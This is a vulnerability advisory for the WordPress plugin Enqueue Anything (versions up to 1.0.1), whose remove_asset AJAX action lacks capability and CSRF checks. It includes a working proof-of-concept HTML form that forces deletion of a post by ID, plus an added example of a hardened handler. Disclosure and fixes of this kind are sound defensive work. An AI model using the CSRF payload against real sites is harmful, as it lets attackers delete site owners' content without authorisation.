WordPress Plugin Vulnerabilities
Enqueue Anything <= 1.0.1 - Subscriber+ Arbitrary Asset/Post Deletion
Description
The plugin does not have authorisation and CSRF checks in the remove_asset AJAX action, and does not ensure that the item to be deleted is actually an asset. As a result, low-privilege users such as subscribers could delete arbitrary assets, as well as put arbitrary posts in the trash.
v1.0.1 added a check to ensure that the post to be removed is an asset. However, the plugin is still missing capability and CSRF checks.
Proof of Concept
As a subscriber, or via CSRF against any authenticated user:

<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="remove_asset" />
      <input type="hidden" name="id" value="289" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
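The three checks the description says are needed (nonce, capability, object type), shown as an added example of a hardened handler; this is not the plugin's own code. The function name, the nonce action and field, the `asset` post type slug, the `ea-admin` script handle and the use of `wp_delete_post()` are assumptions.

```php
<?php
/**
 * Added example, not the plugin's code. Hypothetical names: the handler
 * ea_remove_asset(), the nonce action 'ea_remove_asset', the 'nonce' request
 * field, the post type slug 'asset' and the script handle 'ea-admin'.
 */

// Register for logged-in users only; no wp_ajax_nopriv_ hook is added.
add_action( 'wp_ajax_remove_asset', 'ea_remove_asset' );

function ea_remove_asset() {
    // CSRF: the request must carry a nonce issued to this user for this action.
    // With the third argument false, check_ajax_referer() returns false instead of dying.
    if ( ! check_ajax_referer( 'ea_remove_asset', 'nonce', false ) ) {
        wp_send_json_error( array( 'message' => 'Invalid or missing nonce.' ), 403 );
    }

    $id   = isset( $_POST['id'] ) ? absint( $_POST['id'] ) : 0;
    $post = $id ? get_post( $id ) : null;

    // Object type: only assets may be removed through this endpoint
    // (the kind of check v1.0.1 added).
    if ( ! $post || 'asset' !== $post->post_type ) {
        wp_send_json_error( array( 'message' => 'Not an asset.' ), 400 );
    }

    // Authorisation: the current user must be allowed to delete this specific post.
    // 'delete_post' is a meta capability that WordPress maps per post.
    if ( ! current_user_can( 'delete_post', $post->ID ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions.' ), 403 );
    }

    // Assumption: removal is done with wp_delete_post(); it returns a falsy value on failure.
    if ( ! wp_delete_post( $post->ID ) ) {
        wp_send_json_error( array( 'message' => 'Removal failed.' ), 500 );
    }
    wp_send_json_success( array( 'removed' => $post->ID ) );
}

// The admin page that renders the remove button hands the nonce to its script, e.g.:
// wp_localize_script( 'ea-admin', 'eaAjax', array( 'nonce' => wp_create_nonce( 'ea_remove_asset' ) ) );
```

With these checks in place, the form above is rejected at the nonce check because it carries no `nonce` field, and a subscriber who obtains a valid nonce is still stopped at the capability check.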
Affects Plugins
References
CVE
Classification
Type
NO AUTHORISATION
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
abhishek bhoir
Submitter
abhishek bhoir
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-05-17
Added
2022-05-17
Last Updated
2022-05-18